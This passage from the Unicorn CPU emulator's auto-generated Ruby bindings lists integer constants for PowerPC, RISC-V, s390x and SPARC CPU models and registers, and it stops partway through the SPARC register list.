UC_CPU_PPC32_603E7T = 163; UC_CPU_PPC32_603E7V = 164; UC_CPU_PPC32_603E7V1 = 165; UC_CPU_PPC32_603E7V2 = 166; UC_CPU_PPC32_603P = 167; UC_CPU_PPC32_604 = 168
UC_CPU_PPC32_604E_V1_0 = 169; UC_CPU_PPC32_604E_V2_2 = 170; UC_CPU_PPC32_604E_V2_4 = 171; UC_CPU_PPC32_604R = 172; UC_CPU_PPC32_740_V1_0 = 173; UC_CPU_PPC32_750_V1_0 = 174
UC_CPU_PPC32_740_V2_0 = 175; UC_CPU_PPC32_750_V2_0 = 176; UC_CPU_PPC32_740_V2_1 = 177; UC_CPU_PPC32_750_V2_1 = 178; UC_CPU_PPC32_740_V2_2 = 179; UC_CPU_PPC32_750_V2_2 = 180
UC_CPU_PPC32_740_V3_0 = 181; UC_CPU_PPC32_750_V3_0 = 182; UC_CPU_PPC32_740_V3_1 = 183; UC_CPU_PPC32_750_V3_1 = 184; UC_CPU_PPC32_740E = 185; UC_CPU_PPC32_750E = 186
UC_CPU_PPC32_740P = 187; UC_CPU_PPC32_750P = 188; UC_CPU_PPC32_750CL_V1_0 = 189; UC_CPU_PPC32_750CL_V2_0 = 190; UC_CPU_PPC32_750CX_V1_0 = 191; UC_CPU_PPC32_750CX_V2_0 = 192
UC_CPU_PPC32_750CX_V2_1 = 193; UC_CPU_PPC32_750CX_V2_2 = 194; UC_CPU_PPC32_750CXE_V2_1 = 195; UC_CPU_PPC32_750CXE_V2_2 = 196; UC_CPU_PPC32_750CXE_V2_3 = 197; UC_CPU_PPC32_750CXE_V2_4 = 198
UC_CPU_PPC32_750CXE_V2_4B = 199; UC_CPU_PPC32_750CXE_V3_0 = 200; UC_CPU_PPC32_750CXE_V3_1 = 201; UC_CPU_PPC32_750CXE_V3_1B = 202; UC_CPU_PPC32_750CXR = 203; UC_CPU_PPC32_750FL = 204
UC_CPU_PPC32_750FX_V1_0 = 205; UC_CPU_PPC32_750FX_V2_0 = 206; UC_CPU_PPC32_750FX_V2_1 = 207; UC_CPU_PPC32_750FX_V2_2 = 208; UC_CPU_PPC32_750FX_V2_3 = 209; UC_CPU_PPC32_750GL = 210
UC_CPU_PPC32_750GX_V1_0 = 211; UC_CPU_PPC32_750GX_V1_1 = 212; UC_CPU_PPC32_750GX_V1_2 = 213; UC_CPU_PPC32_750L_V2_0 = 214; UC_CPU_PPC32_750L_V2_1 = 215; UC_CPU_PPC32_750L_V2_2 = 216
UC_CPU_PPC32_750L_V3_0 = 217; UC_CPU_PPC32_750L_V3_2 = 218; UC_CPU_PPC32_745_V1_0 = 219; UC_CPU_PPC32_755_V1_0 = 220; UC_CPU_PPC32_745_V1_1 = 221; UC_CPU_PPC32_755_V1_1 = 222
UC_CPU_PPC32_745_V2_0 = 223; UC_CPU_PPC32_755_V2_0 = 224; UC_CPU_PPC32_745_V2_1 = 225; UC_CPU_PPC32_755_V2_1 = 226; UC_CPU_PPC32_745_V2_2 = 227; UC_CPU_PPC32_755_V2_2 = 228
UC_CPU_PPC32_745_V2_3 = 229; UC_CPU_PPC32_755_V2_3 = 230; UC_CPU_PPC32_745_V2_4 = 231; UC_CPU_PPC32_755_V2_4 = 232; UC_CPU_PPC32_745_V2_5 = 233; UC_CPU_PPC32_755_V2_5 = 234
UC_CPU_PPC32_745_V2_6 = 235; UC_CPU_PPC32_755_V2_6 = 236; UC_CPU_PPC32_745_V2_7 = 237; UC_CPU_PPC32_755_V2_7 = 238; UC_CPU_PPC32_745_V2_8 = 239; UC_CPU_PPC32_755_V2_8 = 240
UC_CPU_PPC32_7400_V1_0 = 241; UC_CPU_PPC32_7400_V1_1 = 242; UC_CPU_PPC32_7400_V2_0 = 243; UC_CPU_PPC32_7400_V2_1 = 244; UC_CPU_PPC32_7400_V2_2 = 245; UC_CPU_PPC32_7400_V2_6 = 246
UC_CPU_PPC32_7400_V2_7 = 247; UC_CPU_PPC32_7400_V2_8 = 248; UC_CPU_PPC32_7400_V2_9 = 249; UC_CPU_PPC32_7410_V1_0 = 250; UC_CPU_PPC32_7410_V1_1 = 251
UC_CPU_PPC32_7410_V1_2 = 252; UC_CPU_PPC32_7410_V1_3 = 253; UC_CPU_PPC32_7410_V1_4 = 254; UC_CPU_PPC32_7448_V1_0 = 255; UC_CPU_PPC32_7448_V1_1 = 256; UC_CPU_PPC32_7448_V2_0 = 257
UC_CPU_PPC32_7448_V2_1 = 258; UC_CPU_PPC32_7450_V1_0 = 259; UC_CPU_PPC32_7450_V1_1 = 260; UC_CPU_PPC32_7450_V1_2 = 261; UC_CPU_PPC32_7450_V2_0 = 262; UC_CPU_PPC32_7450_V2_1 = 263
UC_CPU_PPC32_7441_V2_1 = 264; UC_CPU_PPC32_7441_V2_3 = 265; UC_CPU_PPC32_7451_V2_3 = 266; UC_CPU_PPC32_7441_V2_10 = 267; UC_CPU_PPC32_7451_V2_10 = 268; UC_CPU_PPC32_7445_V1_0 = 269
UC_CPU_PPC32_7455_V1_0 = 270; UC_CPU_PPC32_7445_V2_1 = 271; UC_CPU_PPC32_7455_V2_1 = 272; UC_CPU_PPC32_7445_V3_2 = 273; UC_CPU_PPC32_7455_V3_2 = 274; UC_CPU_PPC32_7445_V3_3 = 275
UC_CPU_PPC32_7455_V3_3 = 276; UC_CPU_PPC32_7445_V3_4 = 277; UC_CPU_PPC32_7455_V3_4 = 278; UC_CPU_PPC32_7447_V1_0 = 279; UC_CPU_PPC32_7457_V1_0 = 280; UC_CPU_PPC32_7447_V1_1 = 281
UC_CPU_PPC32_7457_V1_1 = 282; UC_CPU_PPC32_7457_V1_2 = 283; UC_CPU_PPC32_7447A_V1_0 = 284; UC_CPU_PPC32_7457A_V1_0 = 285; UC_CPU_PPC32_7447A_V1_1 = 286; UC_CPU_PPC32_7457A_V1_1 = 287
UC_CPU_PPC32_7447A_V1_2 = 288; UC_CPU_PPC32_7457A_V1_2 = 289; UC_CPU_PPC32_ENDING = 290

# PPC64 CPU
UC_CPU_PPC64_E5500 = 0; UC_CPU_PPC64_E6500 = 1; UC_CPU_PPC64_970_V2_2 = 2; UC_CPU_PPC64_970FX_V1_0 = 3; UC_CPU_PPC64_970FX_V2_0 = 4; UC_CPU_PPC64_970FX_V2_1 = 5
UC_CPU_PPC64_970FX_V3_0 = 6; UC_CPU_PPC64_970FX_V3_1 = 7; UC_CPU_PPC64_970MP_V1_0 = 8; UC_CPU_PPC64_970MP_V1_1 = 9; UC_CPU_PPC64_POWER5_V2_1 = 10; UC_CPU_PPC64_POWER7_V2_3 = 11
UC_CPU_PPC64_POWER7_V2_1 = 12; UC_CPU_PPC64_POWER8E_V2_1 = 13; UC_CPU_PPC64_POWER8_V2_0 = 14; UC_CPU_PPC64_POWER8NVL_V1_0 = 15; UC_CPU_PPC64_POWER9_V1_0 = 16; UC_CPU_PPC64_POWER9_V2_0 = 17
UC_CPU_PPC64_POWER10_V1_0 = 18; UC_CPU_PPC64_ENDING = 19

# PPC registers
UC_PPC_REG_INVALID = 0

# General purpose registers
UC_PPC_REG_PC = 1
UC_PPC_REG_0 = 2; UC_PPC_REG_1 = 3; UC_PPC_REG_2 = 4; UC_PPC_REG_3 = 5; UC_PPC_REG_4 = 6; UC_PPC_REG_5 = 7; UC_PPC_REG_6 = 8; UC_PPC_REG_7 = 9
UC_PPC_REG_8 = 10; UC_PPC_REG_9 = 11; UC_PPC_REG_10 = 12; UC_PPC_REG_11 = 13; UC_PPC_REG_12 = 14; UC_PPC_REG_13 = 15; UC_PPC_REG_14 = 16; UC_PPC_REG_15 = 17
UC_PPC_REG_16 = 18; UC_PPC_REG_17 = 19; UC_PPC_REG_18 = 20; UC_PPC_REG_19 = 21; UC_PPC_REG_20 = 22; UC_PPC_REG_21 = 23; UC_PPC_REG_22 = 24; UC_PPC_REG_23 = 25
UC_PPC_REG_24 = 26; UC_PPC_REG_25 = 27; UC_PPC_REG_26 = 28; UC_PPC_REG_27 = 29; UC_PPC_REG_28 = 30; UC_PPC_REG_29 = 31; UC_PPC_REG_30 = 32; UC_PPC_REG_31 = 33
UC_PPC_REG_CR0 = 34; UC_PPC_REG_CR1 = 35; UC_PPC_REG_CR2 = 36; UC_PPC_REG_CR3 = 37; UC_PPC_REG_CR4 = 38; UC_PPC_REG_CR5 = 39; UC_PPC_REG_CR6 = 40; UC_PPC_REG_CR7 = 41
UC_PPC_REG_FPR0 = 42; UC_PPC_REG_FPR1 = 43; UC_PPC_REG_FPR2 = 44; UC_PPC_REG_FPR3 = 45; UC_PPC_REG_FPR4 = 46; UC_PPC_REG_FPR5 = 47; UC_PPC_REG_FPR6 = 48; UC_PPC_REG_FPR7 = 49
UC_PPC_REG_FPR8 = 50; UC_PPC_REG_FPR9 = 51; UC_PPC_REG_FPR10 = 52; UC_PPC_REG_FPR11 = 53; UC_PPC_REG_FPR12 = 54; UC_PPC_REG_FPR13 = 55; UC_PPC_REG_FPR14 = 56; UC_PPC_REG_FPR15 = 57
UC_PPC_REG_FPR16 = 58; UC_PPC_REG_FPR17 = 59; UC_PPC_REG_FPR18 = 60; UC_PPC_REG_FPR19 = 61; UC_PPC_REG_FPR20 = 62; UC_PPC_REG_FPR21 = 63; UC_PPC_REG_FPR22 = 64; UC_PPC_REG_FPR23 = 65
UC_PPC_REG_FPR24 = 66; UC_PPC_REG_FPR25 = 67; UC_PPC_REG_FPR26 = 68; UC_PPC_REG_FPR27 = 69; UC_PPC_REG_FPR28 = 70; UC_PPC_REG_FPR29 = 71; UC_PPC_REG_FPR30 = 72; UC_PPC_REG_FPR31 = 73
UC_PPC_REG_LR = 74; UC_PPC_REG_XER = 75; UC_PPC_REG_CTR = 76; UC_PPC_REG_MSR = 77; UC_PPC_REG_FPSCR = 78; UC_PPC_REG_CR = 79; UC_PPC_REG_ENDING = 80
end
==> unicorn-2.1.1/bindings/ruby/unicorn_gem/lib/unicorn_engine/riscv_const.rb <==
# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [riscv_const.rb]

module UnicornEngine

# RISCV32 CPU
UC_CPU_RISCV32_ANY = 0; UC_CPU_RISCV32_BASE32 = 1; UC_CPU_RISCV32_SIFIVE_E31 = 2; UC_CPU_RISCV32_SIFIVE_U34 = 3; UC_CPU_RISCV32_ENDING = 4

# RISCV64 CPU
UC_CPU_RISCV64_ANY = 0; UC_CPU_RISCV64_BASE64 = 1; UC_CPU_RISCV64_SIFIVE_E51 = 2; UC_CPU_RISCV64_SIFIVE_U54 = 3; UC_CPU_RISCV64_ENDING = 4

# RISCV registers
UC_RISCV_REG_INVALID = 0

# General purpose registers
UC_RISCV_REG_X0 = 1; UC_RISCV_REG_X1 = 2; UC_RISCV_REG_X2 = 3; UC_RISCV_REG_X3 = 4; UC_RISCV_REG_X4 = 5; UC_RISCV_REG_X5 = 6; UC_RISCV_REG_X6 = 7; UC_RISCV_REG_X7 = 8
UC_RISCV_REG_X8 = 9; UC_RISCV_REG_X9 = 10; UC_RISCV_REG_X10 = 11; UC_RISCV_REG_X11 = 12; UC_RISCV_REG_X12 = 13; UC_RISCV_REG_X13 = 14; UC_RISCV_REG_X14 = 15; UC_RISCV_REG_X15 = 16
UC_RISCV_REG_X16 = 17; UC_RISCV_REG_X17 = 18; UC_RISCV_REG_X18 = 19; UC_RISCV_REG_X19 = 20; UC_RISCV_REG_X20 = 21; UC_RISCV_REG_X21 = 22; UC_RISCV_REG_X22 = 23; UC_RISCV_REG_X23 = 24
UC_RISCV_REG_X24 = 25; UC_RISCV_REG_X25 = 26; UC_RISCV_REG_X26 = 27; UC_RISCV_REG_X27 = 28; UC_RISCV_REG_X28 = 29; UC_RISCV_REG_X29 = 30; UC_RISCV_REG_X30 = 31; UC_RISCV_REG_X31 = 32

# RISCV CSR
UC_RISCV_REG_USTATUS = 33; UC_RISCV_REG_UIE = 34; UC_RISCV_REG_UTVEC = 35; UC_RISCV_REG_USCRATCH = 36; UC_RISCV_REG_UEPC = 37; UC_RISCV_REG_UCAUSE = 38
UC_RISCV_REG_UTVAL = 39; UC_RISCV_REG_UIP = 40; UC_RISCV_REG_FFLAGS = 41; UC_RISCV_REG_FRM = 42; UC_RISCV_REG_FCSR = 43; UC_RISCV_REG_CYCLE = 44
UC_RISCV_REG_TIME = 45; UC_RISCV_REG_INSTRET = 46
UC_RISCV_REG_HPMCOUNTER3 = 47; UC_RISCV_REG_HPMCOUNTER4 = 48; UC_RISCV_REG_HPMCOUNTER5 = 49; UC_RISCV_REG_HPMCOUNTER6 = 50; UC_RISCV_REG_HPMCOUNTER7 = 51; UC_RISCV_REG_HPMCOUNTER8 = 52
UC_RISCV_REG_HPMCOUNTER9 = 53; UC_RISCV_REG_HPMCOUNTER10 = 54; UC_RISCV_REG_HPMCOUNTER11 = 55; UC_RISCV_REG_HPMCOUNTER12 = 56; UC_RISCV_REG_HPMCOUNTER13 = 57; UC_RISCV_REG_HPMCOUNTER14 = 58
UC_RISCV_REG_HPMCOUNTER15 = 59; UC_RISCV_REG_HPMCOUNTER16 = 60; UC_RISCV_REG_HPMCOUNTER17 = 61; UC_RISCV_REG_HPMCOUNTER18 = 62; UC_RISCV_REG_HPMCOUNTER19 = 63; UC_RISCV_REG_HPMCOUNTER20 = 64
UC_RISCV_REG_HPMCOUNTER21 = 65; UC_RISCV_REG_HPMCOUNTER22 = 66; UC_RISCV_REG_HPMCOUNTER23 = 67; UC_RISCV_REG_HPMCOUNTER24 = 68; UC_RISCV_REG_HPMCOUNTER25 = 69; UC_RISCV_REG_HPMCOUNTER26 = 70
UC_RISCV_REG_HPMCOUNTER27 = 71; UC_RISCV_REG_HPMCOUNTER28 = 72; UC_RISCV_REG_HPMCOUNTER29 = 73; UC_RISCV_REG_HPMCOUNTER30 = 74; UC_RISCV_REG_HPMCOUNTER31 = 75
UC_RISCV_REG_CYCLEH = 76; UC_RISCV_REG_TIMEH = 77; UC_RISCV_REG_INSTRETH = 78
UC_RISCV_REG_HPMCOUNTER3H = 79; UC_RISCV_REG_HPMCOUNTER4H = 80; UC_RISCV_REG_HPMCOUNTER5H = 81; UC_RISCV_REG_HPMCOUNTER6H = 82; UC_RISCV_REG_HPMCOUNTER7H = 83; UC_RISCV_REG_HPMCOUNTER8H = 84
UC_RISCV_REG_HPMCOUNTER9H = 85; UC_RISCV_REG_HPMCOUNTER10H = 86; UC_RISCV_REG_HPMCOUNTER11H = 87; UC_RISCV_REG_HPMCOUNTER12H = 88; UC_RISCV_REG_HPMCOUNTER13H = 89; UC_RISCV_REG_HPMCOUNTER14H = 90
UC_RISCV_REG_HPMCOUNTER15H = 91; UC_RISCV_REG_HPMCOUNTER16H = 92; UC_RISCV_REG_HPMCOUNTER17H = 93; UC_RISCV_REG_HPMCOUNTER18H = 94; UC_RISCV_REG_HPMCOUNTER19H = 95; UC_RISCV_REG_HPMCOUNTER20H = 96
UC_RISCV_REG_HPMCOUNTER21H = 97; UC_RISCV_REG_HPMCOUNTER22H = 98; UC_RISCV_REG_HPMCOUNTER23H = 99; UC_RISCV_REG_HPMCOUNTER24H = 100; UC_RISCV_REG_HPMCOUNTER25H = 101; UC_RISCV_REG_HPMCOUNTER26H = 102
UC_RISCV_REG_HPMCOUNTER27H = 103; UC_RISCV_REG_HPMCOUNTER28H = 104; UC_RISCV_REG_HPMCOUNTER29H = 105; UC_RISCV_REG_HPMCOUNTER30H = 106; UC_RISCV_REG_HPMCOUNTER31H = 107
UC_RISCV_REG_MCYCLE = 108; UC_RISCV_REG_MINSTRET = 109; UC_RISCV_REG_MCYCLEH = 110; UC_RISCV_REG_MINSTRETH = 111; UC_RISCV_REG_MVENDORID = 112; UC_RISCV_REG_MARCHID = 113
UC_RISCV_REG_MIMPID = 114; UC_RISCV_REG_MHARTID = 115; UC_RISCV_REG_MSTATUS = 116; UC_RISCV_REG_MISA = 117; UC_RISCV_REG_MEDELEG = 118; UC_RISCV_REG_MIDELEG = 119
UC_RISCV_REG_MIE = 120; UC_RISCV_REG_MTVEC = 121; UC_RISCV_REG_MCOUNTEREN = 122; UC_RISCV_REG_MSTATUSH = 123; UC_RISCV_REG_MUCOUNTEREN = 124; UC_RISCV_REG_MSCOUNTEREN = 125
UC_RISCV_REG_MHCOUNTEREN = 126; UC_RISCV_REG_MSCRATCH = 127; UC_RISCV_REG_MEPC = 128; UC_RISCV_REG_MCAUSE = 129; UC_RISCV_REG_MTVAL = 130; UC_RISCV_REG_MIP = 131
UC_RISCV_REG_MBADADDR = 132; UC_RISCV_REG_SSTATUS = 133; UC_RISCV_REG_SEDELEG = 134; UC_RISCV_REG_SIDELEG = 135; UC_RISCV_REG_SIE = 136; UC_RISCV_REG_STVEC = 137
UC_RISCV_REG_SCOUNTEREN = 138; UC_RISCV_REG_SSCRATCH = 139; UC_RISCV_REG_SEPC = 140; UC_RISCV_REG_SCAUSE = 141; UC_RISCV_REG_STVAL = 142; UC_RISCV_REG_SIP = 143
UC_RISCV_REG_SBADADDR = 144; UC_RISCV_REG_SPTBR = 145; UC_RISCV_REG_SATP = 146; UC_RISCV_REG_HSTATUS = 147; UC_RISCV_REG_HEDELEG = 148; UC_RISCV_REG_HIDELEG = 149
UC_RISCV_REG_HIE = 150; UC_RISCV_REG_HCOUNTEREN = 151; UC_RISCV_REG_HTVAL = 152; UC_RISCV_REG_HIP = 153; UC_RISCV_REG_HTINST = 154; UC_RISCV_REG_HGATP = 155
UC_RISCV_REG_HTIMEDELTA = 156; UC_RISCV_REG_HTIMEDELTAH = 157

# Floating-point registers
UC_RISCV_REG_F0 = 158; UC_RISCV_REG_F1 = 159; UC_RISCV_REG_F2 = 160; UC_RISCV_REG_F3 = 161; UC_RISCV_REG_F4 = 162; UC_RISCV_REG_F5 = 163; UC_RISCV_REG_F6 = 164; UC_RISCV_REG_F7 = 165
UC_RISCV_REG_F8 = 166; UC_RISCV_REG_F9 = 167; UC_RISCV_REG_F10 = 168; UC_RISCV_REG_F11 = 169; UC_RISCV_REG_F12 = 170; UC_RISCV_REG_F13 = 171; UC_RISCV_REG_F14 = 172; UC_RISCV_REG_F15 = 173
UC_RISCV_REG_F16 = 174; UC_RISCV_REG_F17 = 175; UC_RISCV_REG_F18 = 176; UC_RISCV_REG_F19 = 177; UC_RISCV_REG_F20 = 178; UC_RISCV_REG_F21 = 179; UC_RISCV_REG_F22 = 180; UC_RISCV_REG_F23 = 181
UC_RISCV_REG_F24 = 182; UC_RISCV_REG_F25 = 183; UC_RISCV_REG_F26 = 184; UC_RISCV_REG_F27 = 185; UC_RISCV_REG_F28 = 186; UC_RISCV_REG_F29 = 187; UC_RISCV_REG_F30 = 188; UC_RISCV_REG_F31 = 189
UC_RISCV_REG_PC = 190; UC_RISCV_REG_ENDING = 191

# Alias registers
UC_RISCV_REG_ZERO = 1; UC_RISCV_REG_RA = 2; UC_RISCV_REG_SP = 3; UC_RISCV_REG_GP = 4; UC_RISCV_REG_TP = 5; UC_RISCV_REG_T0 = 6; UC_RISCV_REG_T1 = 7; UC_RISCV_REG_T2 = 8
UC_RISCV_REG_S0 = 9; UC_RISCV_REG_FP = 9; UC_RISCV_REG_S1 = 10; UC_RISCV_REG_A0 = 11; UC_RISCV_REG_A1 = 12; UC_RISCV_REG_A2 = 13; UC_RISCV_REG_A3 = 14; UC_RISCV_REG_A4 = 15
UC_RISCV_REG_A5 = 16; UC_RISCV_REG_A6 = 17; UC_RISCV_REG_A7 = 18; UC_RISCV_REG_S2 = 19; UC_RISCV_REG_S3 = 20; UC_RISCV_REG_S4 = 21; UC_RISCV_REG_S5 = 22; UC_RISCV_REG_S6 = 23
UC_RISCV_REG_S7 = 24; UC_RISCV_REG_S8 = 25; UC_RISCV_REG_S9 = 26; UC_RISCV_REG_S10 = 27; UC_RISCV_REG_S11 = 28; UC_RISCV_REG_T3 = 29; UC_RISCV_REG_T4 = 30
UC_RISCV_REG_T5 = 31; UC_RISCV_REG_T6 = 32
UC_RISCV_REG_FT0 = 158; UC_RISCV_REG_FT1 = 159; UC_RISCV_REG_FT2 = 160; UC_RISCV_REG_FT3 = 161; UC_RISCV_REG_FT4 = 162; UC_RISCV_REG_FT5 = 163; UC_RISCV_REG_FT6 = 164; UC_RISCV_REG_FT7 = 165
UC_RISCV_REG_FS0 = 166; UC_RISCV_REG_FS1 = 167; UC_RISCV_REG_FA0 = 168; UC_RISCV_REG_FA1 = 169; UC_RISCV_REG_FA2 = 170; UC_RISCV_REG_FA3 = 171; UC_RISCV_REG_FA4 = 172; UC_RISCV_REG_FA5 = 173
UC_RISCV_REG_FA6 = 174; UC_RISCV_REG_FA7 = 175; UC_RISCV_REG_FS2 = 176; UC_RISCV_REG_FS3 = 177; UC_RISCV_REG_FS4 = 178; UC_RISCV_REG_FS5 = 179; UC_RISCV_REG_FS6 = 180; UC_RISCV_REG_FS7 = 181
UC_RISCV_REG_FS8 = 182; UC_RISCV_REG_FS9 = 183; UC_RISCV_REG_FS10 = 184; UC_RISCV_REG_FS11 = 185; UC_RISCV_REG_FT8 = 186; UC_RISCV_REG_FT9 = 187; UC_RISCV_REG_FT10 = 188; UC_RISCV_REG_FT11 = 189
end
unicorn-2.1.1/bindings/ruby/unicorn_gem/lib/unicorn_engine/s390x_const.rb

# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [s390x_const.rb]

module UnicornEngine

# S390X CPU

    UC_CPU_S390X_Z900 = 0
    UC_CPU_S390X_Z900_2 = 1
    UC_CPU_S390X_Z900_3 = 2
    UC_CPU_S390X_Z800 = 3
    UC_CPU_S390X_Z990 = 4
    UC_CPU_S390X_Z990_2 = 5
    UC_CPU_S390X_Z990_3 = 6
    UC_CPU_S390X_Z890 = 7
    UC_CPU_S390X_Z990_4 = 8
    UC_CPU_S390X_Z890_2 = 9
    UC_CPU_S390X_Z990_5 = 10
    UC_CPU_S390X_Z890_3 = 11
    UC_CPU_S390X_Z9EC = 12
    UC_CPU_S390X_Z9EC_2 = 13
    UC_CPU_S390X_Z9BC = 14
    UC_CPU_S390X_Z9EC_3 = 15
    UC_CPU_S390X_Z9BC_2 = 16
    UC_CPU_S390X_Z10EC = 17
    UC_CPU_S390X_Z10EC_2 = 18
    UC_CPU_S390X_Z10BC = 19
    UC_CPU_S390X_Z10EC_3 = 20
    UC_CPU_S390X_Z10BC_2 = 21
    UC_CPU_S390X_Z196 = 22
    UC_CPU_S390X_Z196_2 = 23
    UC_CPU_S390X_Z114 = 24
    UC_CPU_S390X_ZEC12 = 25
    UC_CPU_S390X_ZEC12_2 = 26
    UC_CPU_S390X_ZBC12 = 27
    UC_CPU_S390X_Z13 = 28
    UC_CPU_S390X_Z13_2 = 29
    UC_CPU_S390X_Z13S = 30
    UC_CPU_S390X_Z14 = 31
    UC_CPU_S390X_Z14_2 = 32
    UC_CPU_S390X_Z14ZR1 = 33
    UC_CPU_S390X_GEN15A = 34
    UC_CPU_S390X_GEN15B = 35
    UC_CPU_S390X_QEMU = 36
    UC_CPU_S390X_MAX = 37
    UC_CPU_S390X_ENDING = 38

# S390X registers

    UC_S390X_REG_INVALID = 0

# General purpose registers
    UC_S390X_REG_R0 = 1
    UC_S390X_REG_R1 = 2
    UC_S390X_REG_R2 = 3
    UC_S390X_REG_R3 = 4
    UC_S390X_REG_R4 = 5
    UC_S390X_REG_R5 = 6
    UC_S390X_REG_R6 = 7
    UC_S390X_REG_R7 = 8
    UC_S390X_REG_R8 = 9
    UC_S390X_REG_R9 = 10
    UC_S390X_REG_R10 = 11
    UC_S390X_REG_R11 = 12
    UC_S390X_REG_R12 = 13
    UC_S390X_REG_R13 = 14
    UC_S390X_REG_R14 = 15
    UC_S390X_REG_R15 = 16

# Floating point registers
    UC_S390X_REG_F0 = 17
    UC_S390X_REG_F1 = 18
    UC_S390X_REG_F2 = 19
    UC_S390X_REG_F3 = 20
    UC_S390X_REG_F4 = 21
    UC_S390X_REG_F5 = 22
    UC_S390X_REG_F6 = 23
    UC_S390X_REG_F7 = 24
    UC_S390X_REG_F8 = 25
    UC_S390X_REG_F9 = 26
    UC_S390X_REG_F10 = 27
    UC_S390X_REG_F11 = 28
    UC_S390X_REG_F12 = 29
    UC_S390X_REG_F13 = 30
    UC_S390X_REG_F14 = 31
    UC_S390X_REG_F15 = 32
    UC_S390X_REG_F16 = 33
    UC_S390X_REG_F17 = 34
    UC_S390X_REG_F18 = 35
    UC_S390X_REG_F19 = 36
    UC_S390X_REG_F20 = 37
    UC_S390X_REG_F21 = 38
    UC_S390X_REG_F22 = 39
    UC_S390X_REG_F23 = 40
    UC_S390X_REG_F24 = 41
    UC_S390X_REG_F25 = 42
    UC_S390X_REG_F26 = 43
    UC_S390X_REG_F27 = 44
    UC_S390X_REG_F28 = 45
    UC_S390X_REG_F29 = 46
    UC_S390X_REG_F30 = 47
    UC_S390X_REG_F31 = 48

# Access registers
    UC_S390X_REG_A0 = 49
    UC_S390X_REG_A1 = 50
    UC_S390X_REG_A2 = 51
    UC_S390X_REG_A3 = 52
    UC_S390X_REG_A4 = 53
    UC_S390X_REG_A5 = 54
    UC_S390X_REG_A6 = 55
    UC_S390X_REG_A7 = 56
    UC_S390X_REG_A8 = 57
    UC_S390X_REG_A9 = 58
    UC_S390X_REG_A10 = 59
    UC_S390X_REG_A11 = 60
    UC_S390X_REG_A12 = 61
    UC_S390X_REG_A13 = 62
    UC_S390X_REG_A14 = 63
    UC_S390X_REG_A15 = 64

    UC_S390X_REG_PC = 65
    UC_S390X_REG_PSWM = 66
    UC_S390X_REG_ENDING = 67

# Alias registers
end
unicorn-2.1.1/bindings/ruby/unicorn_gem/lib/unicorn_engine/sparc_const.rb

# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [sparc_const.rb]

module UnicornEngine

# SPARC32 CPU

    UC_CPU_SPARC32_FUJITSU_MB86904 = 0
    UC_CPU_SPARC32_FUJITSU_MB86907 = 1
    UC_CPU_SPARC32_TI_MICROSPARC_I = 2
    UC_CPU_SPARC32_TI_MICROSPARC_II = 3
    UC_CPU_SPARC32_TI_MICROSPARC_IIEP = 4
    UC_CPU_SPARC32_TI_SUPERSPARC_40 = 5
    UC_CPU_SPARC32_TI_SUPERSPARC_50 = 6
    UC_CPU_SPARC32_TI_SUPERSPARC_51 = 7
    UC_CPU_SPARC32_TI_SUPERSPARC_60 = 8
    UC_CPU_SPARC32_TI_SUPERSPARC_61 = 9
    UC_CPU_SPARC32_TI_SUPERSPARC_II = 10
    UC_CPU_SPARC32_LEON2 = 11
    UC_CPU_SPARC32_LEON3 = 12
    UC_CPU_SPARC32_ENDING = 13

# SPARC64 CPU

    UC_CPU_SPARC64_FUJITSU = 0
    UC_CPU_SPARC64_FUJITSU_III = 1
    UC_CPU_SPARC64_FUJITSU_IV = 2
    UC_CPU_SPARC64_FUJITSU_V = 3
    UC_CPU_SPARC64_TI_ULTRASPARC_I = 4
    UC_CPU_SPARC64_TI_ULTRASPARC_II = 5
    UC_CPU_SPARC64_TI_ULTRASPARC_III = 6
    UC_CPU_SPARC64_TI_ULTRASPARC_IIE = 7
    UC_CPU_SPARC64_SUN_ULTRASPARC_III = 8
    UC_CPU_SPARC64_SUN_ULTRASPARC_III_CU = 9
    UC_CPU_SPARC64_SUN_ULTRASPARC_IIII = 10
    UC_CPU_SPARC64_SUN_ULTRASPARC_IV = 11
    UC_CPU_SPARC64_SUN_ULTRASPARC_IV_PLUS = 12
    UC_CPU_SPARC64_SUN_ULTRASPARC_IIII_PLUS = 13
    UC_CPU_SPARC64_SUN_ULTRASPARC_T1 = 14
    UC_CPU_SPARC64_SUN_ULTRASPARC_T2 = 15
    UC_CPU_SPARC64_NEC_ULTRASPARC_I = 16
    UC_CPU_SPARC64_ENDING = 17

# SPARC registers

    UC_SPARC_REG_INVALID = 0
    UC_SPARC_REG_F0 = 1
    UC_SPARC_REG_F1 = 2
    UC_SPARC_REG_F2 = 3
    UC_SPARC_REG_F3 = 4
    UC_SPARC_REG_F4 = 5
    UC_SPARC_REG_F5 = 6
    UC_SPARC_REG_F6 = 7
    UC_SPARC_REG_F7 = 8
    UC_SPARC_REG_F8 = 9
    UC_SPARC_REG_F9 = 10
    UC_SPARC_REG_F10 = 11
    UC_SPARC_REG_F11 = 12
    UC_SPARC_REG_F12 = 13
    UC_SPARC_REG_F13 = 14
    UC_SPARC_REG_F14 = 15
    UC_SPARC_REG_F15 = 16
    UC_SPARC_REG_F16 = 17
    UC_SPARC_REG_F17 = 18
    UC_SPARC_REG_F18 = 19
    UC_SPARC_REG_F19 = 20
    UC_SPARC_REG_F20 = 21
    UC_SPARC_REG_F21 = 22
    UC_SPARC_REG_F22 = 23
    UC_SPARC_REG_F23 = 24
    UC_SPARC_REG_F24 = 25
    UC_SPARC_REG_F25 = 26
    UC_SPARC_REG_F26 = 27
    UC_SPARC_REG_F27 = 28
    UC_SPARC_REG_F28 = 29
    UC_SPARC_REG_F29 = 30
    UC_SPARC_REG_F30 = 31
    UC_SPARC_REG_F31 = 32
    UC_SPARC_REG_F32 = 33
    UC_SPARC_REG_F34 = 34
    UC_SPARC_REG_F36 = 35
    UC_SPARC_REG_F38 = 36
    UC_SPARC_REG_F40 = 37
    UC_SPARC_REG_F42 = 38
    UC_SPARC_REG_F44 = 39
    UC_SPARC_REG_F46 = 40
    UC_SPARC_REG_F48 = 41
    UC_SPARC_REG_F50 = 42
    UC_SPARC_REG_F52 = 43
    UC_SPARC_REG_F54 = 44
    UC_SPARC_REG_F56 = 45
    UC_SPARC_REG_F58 = 46
    UC_SPARC_REG_F60 = 47
    UC_SPARC_REG_F62 = 48
    UC_SPARC_REG_FCC0 = 49
    UC_SPARC_REG_FCC1 = 50
    UC_SPARC_REG_FCC2 = 51
    UC_SPARC_REG_FCC3 = 52
    UC_SPARC_REG_G0 = 53
